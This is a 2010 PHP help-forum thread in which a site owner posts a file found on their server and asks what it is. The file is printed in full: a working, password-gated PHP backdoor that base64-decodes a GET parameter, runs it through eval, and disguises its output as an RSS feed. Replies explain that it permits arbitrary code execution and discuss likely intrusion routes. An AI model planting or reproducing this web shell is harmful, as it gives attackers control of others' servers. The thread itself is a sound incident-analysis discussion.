sastro Posted January 1, 2010 Share Posted January 1, 2010 I found a PHP file in my web yesterday. Here is the content <?php error_reporting(0); if (!isset($_GET['a'])) { die("inQontrol"); } $pass = "4f7c192d4ea7b0758f191865577f36f2"; echo "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>"; echo "<rss version=\"2.0\">"; echo "<channel><title>inQontrol</title><link>http://google.com/</link><description>inQontrol</description><language>en</language><copyright>inQontrol</copyright>\n\n"; echo "<output>"; function writerss($name,$text) { echo "<".base64_encode($name).">".base64_encode($text)."</".base64_encode($name).">\n"; } $a = $_GET['a']; $a = md5(base64_decode($a)); if ($a != $pass) { writerss("status","wrongpass"); } else { writerss("status","ok"); $b = $_GET['b']; $b = base64_decode($b); eval($b); } echo "\n\n</output></channel></rss>"; ?> What is this file? Quote Link to comment https://forums.phpfreaks.com/topic/186862-what-is-this/ Share on other sites More sharing options...
premiso Posted January 1, 2010 Share Posted January 1, 2010 Its dangerous code whatever it is. Will allow someone who put it there to pretty much execute any code they want on your server with that eval. Quote Link to comment https://forums.phpfreaks.com/topic/186862-what-is-this/#findComment-986819 Share on other sites More sharing options...
Mchl Posted January 1, 2010 Share Posted January 1, 2010 Congratulations, your site has been compromised and infected with some kind of malicious script. It uses eval to let a person who knows the password do just about anything on your account. Quote Link to comment https://forums.phpfreaks.com/topic/186862-what-is-this/#findComment-986820 Share on other sites More sharing options...
sastro Posted January 1, 2010 Author Share Posted January 1, 2010 How they put this file there? I've been using strip_tags to sanitize the input form. Is it not enough? Quote Link to comment https://forums.phpfreaks.com/topic/186862-what-is-this/#findComment-986827 Share on other sites More sharing options...
premiso Posted January 1, 2010 Share Posted January 1, 2010 Chances are one of the script in your site includes a file from GET data. And you do not check if that file exists on your server and you do not limit it to a white list of pages. This is dangerous in many ways as if allow_fopen_wrappers is on then yea, it can execute a remote script and open your site up to security breaches like so. Quote Link to comment https://forums.phpfreaks.com/topic/186862-what-is-this/#findComment-986828 Share on other sites More sharing options...
Mchl Posted January 1, 2010 Share Posted January 1, 2010 Is it not enough? Hardly... http://www.phpfreaks.com/tutorial/php-security Quote Link to comment https://forums.phpfreaks.com/topic/186862-what-is-this/#findComment-986834 Share on other sites More sharing options...
Irresistable Posted January 1, 2010 Share Posted January 1, 2010 Can anyone give me any information on this? I haven't experienced this happening before. Though I'd like to know more about it, how they do it, what it can do and how to prevent. With the main one, what is this called. Quote Link to comment https://forums.phpfreaks.com/topic/186862-what-is-this/#findComment-986863 Share on other sites More sharing options...
Mchl Posted January 1, 2010 Share Posted January 1, 2010 See the article to which I linked above. There are many methods this could be achieved. One option not mentiond there, but apparently quite common recently is a malware stealing your ftp password (stored in your ftp client) Quote Link to comment https://forums.phpfreaks.com/topic/186862-what-is-this/#findComment-986871 Share on other sites More sharing options...
Irresistable Posted January 1, 2010 Share Posted January 1, 2010 Do you know any methods to tackle that? Being as it's not mentioned in the article. Quote Link to comment https://forums.phpfreaks.com/topic/186862-what-is-this/#findComment-986896 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.